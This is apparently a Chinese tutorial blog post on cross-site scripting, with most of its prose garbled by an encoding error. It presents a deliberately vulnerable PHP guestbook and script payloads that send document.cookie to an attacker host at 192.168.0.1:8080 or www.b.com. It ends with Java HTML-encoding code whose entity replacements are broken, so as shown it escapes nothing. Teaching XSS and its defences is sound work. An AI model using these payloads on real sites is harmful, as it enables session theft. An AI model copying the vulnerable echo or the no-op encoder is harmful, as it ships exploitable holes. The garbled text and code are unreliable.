??绠???涓???锛?????eb瀹??ㄦ?娲???涓?瑗匡?浠?澶╁??濉?涓?XSS??锛??虹???锛?澶х?杞诲?枫??
======
????浜???缃?娴?琛?锛?浠ュ??缃?绔?浜??ㄦ?х????楂?锛???璁哄????寰???杩?????绉?web2.0搴??ㄧ???磋捣锛?寰?澶?缃?绔??藉??浠ョ?辩?ㄦ?锋??澶???灏?????涓?锛????藉?澶???缃?绔??ㄦ?锋敞??涔????藉??浠ヨ??璁恒????甯?绛?绛???
褰??惰?浜??芥??瀵规?e父?????ㄦ?锋?ヨ?寸??锛?濡?????涓?涓??诲?昏??褰??朵?浼?????瀹?瀹?????甯?瀛?涔?绫荤??浜???
浼????ㄧ?ワ??板?ㄧ???扮??缃?椤靛?烘???芥????tml??javascript??css绛??????ㄦ?瑙??ㄧ??灞?绀虹??锛???浠ュ???涓?涓?榛?瀹㈣??ョ??涓???姝e父??璇?璁猴?????涓?娈?tml??javascript??css绛???娴?瑙??ㄦ??????浠g??浼?濡?浣????
涓??㈡?ュ??涓?瀹?楠?锛?杩??????句?浜?涓?涓???灏???????瀛?????绠?????绫讳技??瑷??跨??php绋?搴?锛????藉氨??绠????????ㄦ?锋??浜ょ??涓?瑗????剧ず???汇??
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<title>娴?璇?椤甸??lt;/title>
</head>
<body>
<?php
if(empty($_REQUEST["T1"]) === false)
{
echo "?ㄦ?风??瑷?:".$_REQUEST["T1"];
}
?>
<form method="POST" action="">
<p>??瑷?:<br/>
<textarea class="area-text" style="width: 708px; height: 75px; overflow: hidden;" name="T1"></textarea></p>
<p><input type="submit" value="??浜?></p>
</form>
</body>
</html>
??寮????峰??濡?涓?锛?
杈??ヤ?涓?浣?濂斤?涓??㈢???ㄦ?风??瑷???浼??剧ず涓?涓?浣?濂?涓??㈡?ヨ??ヤ??瑰ソ?╃??锛?
浜???褰??瑰?绘??浜や???锛?
?鹃??杩???涓?搴?璇ユ???ㄧ?ㄦ?风??瑷????剧ず?e??s浠g??涔?锛?璁╂??浠??ョ????椤甸?㈢??html浠g???ㄥ????涓ゆ?℃??浜ゅ????浠?涔??哄????
绗?涓?娆★?
寰?姝e父
绗?浜?娆★?
娉ㄦ????????浜ょ??<script>alert("This is a xsscode")</script>?存?ュ氨??涓?eb椤甸??唬????涓??ㄥ????
?ㄨ???璁╂??浠??ュ??椤句???浠?????瑷??夸唬??锛?澶????ㄦ?锋??浜ゅ??瀹圭???i?ㄥ??
<?php
if(empty($_REQUEST["T1"]) === false)
{
echo "?ㄦ?风??瑷?:".$_REQUEST["T1"];
}
?>
棣?????浜?涓?涓??ゆ??锛?妫??ュ????1??涓???涓虹┖锛?
涔???涓?涓虹┖灏辨?ц?涓??㈢?????捐???ワ??ㄢ???ㄦ?风??瑷?锛??????㈡?兼?ヤ?T1???颁腑????瀹癸??????惧?伴〉?????
??浠ョ???拌???锛?杩?涓?绮?蹇?????灏???????瀛?病??瀵?1????瀹瑰??浠讳?妫??ワ?灏辫???缁?浜??ㄦ?凤?灏肩??璧风??涔?寰?杩?婊や釜????璇???锛?缃?绔?涓??㈠??涓?xx???烘?ヨ?琚??ユ按琛ㄧ????
浜?????浠?灏辨?ヨЕ?颁?绗?涓?涓?xss婕?娲?锛?涔?灏辨??璺ㄧ??????锛??辨??Cross-Site Script锛?杩???缂╁??涓轰???甯歌???css锛?灞????峰?琛???哄??灏变娇?ㄤ?xss??
xss婕?娲?寰?甯歌?锛?绋?搴???绮?蹇?瀵逛??ョ?????版病??妫??ワ?????妫??ヤ???澶???浜?锛?浣????$?剧??榛?瀹㈤??杩?绉?绉???娈电?杩??讳??戒?????xss婕?娲???
涓??朵?涓?浜?婕?娲?涓?澶??稿??????锛?????ss婕?娲??存?ユ?诲?荤????娴?瑙??ㄧ??锛?涔?灏辨??褰?涓?涓?榛?瀹㈠??璧锋?诲?诲??锛?瀹????ц??诲?讳唬??????娴?瑙?缃?绔????ㄦ?锋??浣跨?ㄧ??娴?瑙?????ㄨ?涓?杩?绋?涓?缃?绔??????″?ㄥ????璧峰?颁?涓?涓???甯??垛????浣??ㄣ??
?d?杩?绉?婕?娲???浠?涔??卞?冲???灏???锛?浜轰?灏辨??寮逛釜妗???浠?涔?澶т?浜???锛?锛?
?板?ㄨ浆???涓??烘??锛?灏?????boss??璁╁?????浜?涓?涓?璁哄??绋?搴?锛???绉?????璁ょ??锛????????轰?涓?涓????风??璁哄??锛??ㄦ?峰?澶???甯?韪?璺?锛?boss????happy??浣???浠?浠??舵病娉ㄦ??xss婕?娲?????棰???
璁╂??浠??ㄤ?瀹??ユ???插???
??????浜?杩?涔?涓?涓?甯?瀛?锛???棰?灏卞??hello,??瀹规??杩??风??:
helloworld
<script type=text/javascript>window.location = " http://192.168.0.1:8080/cookie.php?cookie="+document.cookie</script>
璁╂??浠????哄?伙?绛?绛?????浜虹?瑰?涔???浼?????浠?涔?
锛?婕?绀哄????绋?搴?锛???澶???灏变??村?版?版??搴???瀛?浜?锛???琛ヤ?灏????归?炬?ョ???ㄤ?灏卞ソ锛?锛?
杩???浠?涔?锛?灏?????瀛???cookie??锛??ㄦ?峰????瀵????藉ぇ?????????ㄩ?i??锛???涓?杩??撮?蹭?灏?????瀛???????浣?濡圭??浜?????
璁╂??浠??ョ????杩?涓?杩?绋?涓?????浜?浠?涔?锛?棣????变滑??瀹????d釜js浠g??????楝硷?涓??辨??涓?涓??ㄥ??
绗?涓?锛?document.cookie,杩????峰??浜??ョ??璐村??浜虹??cookie锛?
绗?浜?锛? "http://192.168.0.1:8080/cookie.php?cookie="+document. cookie 杩??ㄥ??峰???扮??cookie?煎?颁??d釜缃???????涓?涓???涓衡??cookie????瀛?娈甸??
绗?涓?锛?璋???indow.location灏??ㄦ?风??娴?瑙??ㄦ????浜?杩?涓?缃???
??浠ユ????杈惧?扮????????锛????ㄦ?风??cookie??浜ょ?浜?http://192.168.0.1:8080/coo?kie.php 杩?涓?缃?椤点??
杩?涓?缃?椤靛共浜?浠?涔????寰?绠?????灏?cookie瀛?娈靛???虹?跺?????惧?烘?ャ??
褰??跺???惧?烘?ュ苟涓?涓ラ??锛?浣???濡???浠?????????瀛?璧锋?ヤ????
濡???榛?瀹㈠??楂?绾т??癸?淇??逛?涓??d釜???哄?荤??js浠g??锛??╃?ㄥ??寤轰?涓??剧??锛?灏??剧???板???煎??cookie瀛?娈靛?兼?????d釜cookie.php锛??跺????ookie.php?i??淇?瀛?骞惰???涓?涓?姝e父???剧????
oh锛?no锛?terrible.
榛?瀹㈡?垮??ookie涔???锛?濉??颁???娴?瑙??ㄩ??锛?灏辫?藉?╃?ㄥ?????韬?浠藉?ㄨ?哄??涓?涓烘??娆蹭负浜???
??锛?xss婕?娲???澶???????
?????ヨ??锛?楂???Coder锛??????板??锛?http://blog.csdn.net/ghsau/article/details/17027893锛?杞?杞借?锋敞????
? ? ? ?XSS??绉?SS锛??ㄧОCross SiteScript锛?璺ㄧ???????诲?伙???Web绋?搴?涓?甯歌???婕?娲?锛?XSS灞?浜?琚??ㄥ?涓??ㄤ?瀹㈡?风?????诲?绘?瑰?锛???浠ュ?规??琚?蹇界?ュ?跺?卞?虫?с???跺???????诲?昏??????XSS婕?娲???缃?绔?涓?杈???浼????舵????HTML浠g??锛?褰??跺???ㄦ?锋?瑙?璇ョ?绔??讹?杩?娈?TML浠g??浼????ㄦ?ц?锛?浠???杈惧?版?诲?荤????????濡?锛??????ㄦ??ookie???村??椤甸?㈢???????瀹????板?跺??缃?绔?绛???
XSS?诲??/h1>
? ? ? ?XSS?诲?荤被浼间?SQL娉ㄥ?ユ?诲?伙??诲?讳???锛???浠????惧?颁?涓?瀛???SS婕?娲???缃?绔?锛?XSS婕?娲???涓轰袱绉?锛?涓?绉???DOM Based XSS婕?娲?锛????绉???Stored XSS婕?娲?????璁轰?锛???????杈??ョ???版?规病??瀵硅??ユ?版??杩?琛?澶?????璇?锛??戒?瀛???SS婕?娲?锛?婕?娲????卞?冲???充??诲?讳唬????濞???锛??诲?讳唬??涔?涓?灞???浜?script??
DOM Based XSS
? ? ? ?DOM Based XSS??涓?绉??轰?缃?椤?OM缁??????诲?伙?璇ユ?诲?荤?圭?规??涓?????浜烘??灏??颁汉??
? ? ? ??烘??涓?锛?
? ? ? ?褰????诲?a.com??锛??????板????椤甸?㈡??浜???瀹规???规??url涓???涓?涓???content???扮?存?ユ?剧ず??锛???娴?瀹?娴?椤甸?㈠??????芥??杩??凤??跺??璇?瑷?绫讳技锛??
| <%@?page?language="Java"?contentType="text/html; charset=UTF-8"?pageEncoding="UTF-8"%> <!DOCTYPEhtmlPUBLIC"-//W3C//DTD HTML 4.01 Transitional//EN""http://www.w3.org/TR/html4/loose.dtd"> <html> ????<head> ???????<title>XSS娴?璇?</title> ????</head> ????<body> ?????? 椤甸?㈠??瀹癸?<%=request.getParameter("content")%> ????</body> </html> |
? ? ? ???ラ??浜?Tom涔?娉ㄥ??浜?璇ョ?绔?锛?骞朵??ラ??浜?浠?????绠??????跺???芥?ユ?朵俊??????绯绘?瑰?)锛?????涓?涓?瓒??炬?ュ??缁?浠?锛?瓒??炬?ュ?板??涓猴?http://www.a.com?content=<script>window.open(??www.b.com?param=??+document.cookie)</script>锛?褰?Tom?瑰?昏?涓??炬?ョ???跺??(??璁句?宸茬??诲?a.com)锛?娴?瑙??ㄥ氨浼??存?ユ??寮?b.com锛?骞朵???Tom??.com涓???cookie淇℃????????.com锛?b.com??????寤虹??缃?绔?锛?褰?????缃?绔??ユ?跺?拌?ヤ俊???讹???灏辩????浜?Tom??.com??cookie淇℃??锛?cookie淇℃??涓????藉?????诲?瀵???锛??诲?绘????锛?杩?涓?杩?绋?涓?锛???瀹宠??????Tom??宸便???e????ㄦ?瑙??ㄨ???.com?content=<script>alert(??xss??)</script>锛?娴?瑙??ㄥ?绀洪〉?㈠??瀹圭??杩?绋?涓?锛?灏变??ц?????????锛?椤甸?㈣???ss瀛??凤?杩????诲?讳?????宸憋??f??濡?浣??诲?诲??浜哄苟涓??峰?╁???
Stored XSS
? ? ? ?Stored XSS??瀛??ㄥ?XSS婕?娲?锛??变??舵?诲?讳唬??宸茬?瀛??ㄥ?版???″?ㄤ??????版??搴?涓?锛???浠ュ??瀹宠????寰?澶?浜恒??
? ? ? ??烘??浜?锛?
? ? ? ?a.com??浠ュ????绔?锛????诲?????.com涓???甯?浜?涓?绡???绔?锛???绔?涓?????浜??舵??浠g??锛?<script>window.open(??www.b.com?param=??+document.cookie)</script>锛?淇?瀛???绔???杩???om??Jack???颁?????甯?????绔?锛?褰??ㄦ?ョ????????绔??跺氨?戒腑??浜?锛?浠?浠???cookie淇℃???藉?????颁????????″?ㄤ?锛??诲?绘????锛?杩?涓?杩?绋?涓?锛???瀹宠????澶?涓?浜恒??
? ? ? ?Stored XSS婕?娲??卞?虫?ф?村ぇ锛??卞?抽?㈡?村箍??
XSS?插尽
? ? ? ???浠????ㄤ?涓????剧??涓???涓?锛?????灏辨???俱????瑕???浠???浠g??涓?涓?瀛??ㄦ?娲?锛??诲?昏??灏辨??浠?涓???锛???浠?瑕???涓?涓?娌℃??缂???????XSS?插尽??濡?涓??瑰???
瀹?????杩?婊や?绯?/h2>
? ? ? ?姘歌?涓??镐俊?ㄦ?风??杈??ャ????瑕?瀵圭?ㄦ?风??杈??ヨ?琛?澶???锛?????璁歌??ュ??娉????硷??跺???间?姒?杩?婊ゆ????
Html encode
? ? ? ???濡???浜????典?锛???浠?涓??藉?圭?ㄦ?锋?版??杩?琛?涓ユ?肩??杩?婊わ??f??浠?涔???瑕?瀵规??绛捐?琛?杞?????| less-than character (<) | < |
| greater-than character (>) | > |
| ampersand character (&) | & |
| double-quote character (") | " |
| space character( ) | |
| Any ASCII code character whose code is greater-than or equal to 0x80 | &#<number>, where <number> is the ASCII character value. |
? ? ??姣?濡??ㄦ?疯??ワ?<script>window.location.href=??http://www.baidu.com??;</script>锛?淇?瀛?????缁?瀛??ㄧ??浼???锛?<script>window.location.href="http://www.baidu.com"</script>?ㄥ??版?舵?瑙??ㄤ?瀵硅?浜?瀛?绗?浆?㈡????????瀹规?剧ず锛???涓???涓?娈靛???ц???浠g????
?跺??
? ? ? ?涓??㈡??渚?涓ょ?Html encode???规???
- 浣跨??pache??commons-lang.jar
StringEscapeUtils.escapeHtml(str);// 姹?瀛?浼?杞??㈡??瀵瑰???ASCII??锛?绌烘?间?杞???
- ??宸卞???拌浆?????杞??㈤?ㄥ??瀛?绗?
private?static?String htmlEncode(char?c) {
????switch(c) {
???????case?'&':
???????????return?"&";
???????case?'<':
???????????return?"<";
???????case?'>':
???????????return?">";
???????case?'"':
???????????return?""";
???????case?' ':
???????????return?" ";
???????default:
???????????return?c +?"";
??? }
}
?
public?static?String htmlEncode(String str) {
????if?(str ==null?|| str.trim().equals(""))???return?str;
??? StringBuilder encodeStrBuilder =?new?StringBuilder();
????for?(int?i = 0, len = str.length(); i < len; i++) {
?????? encodeStrBuilder.append(htmlEncode(str.charAt(i)));
??? }
????return?encodeStrBuilder.toString();
}
? ? ? ?(瀹?)?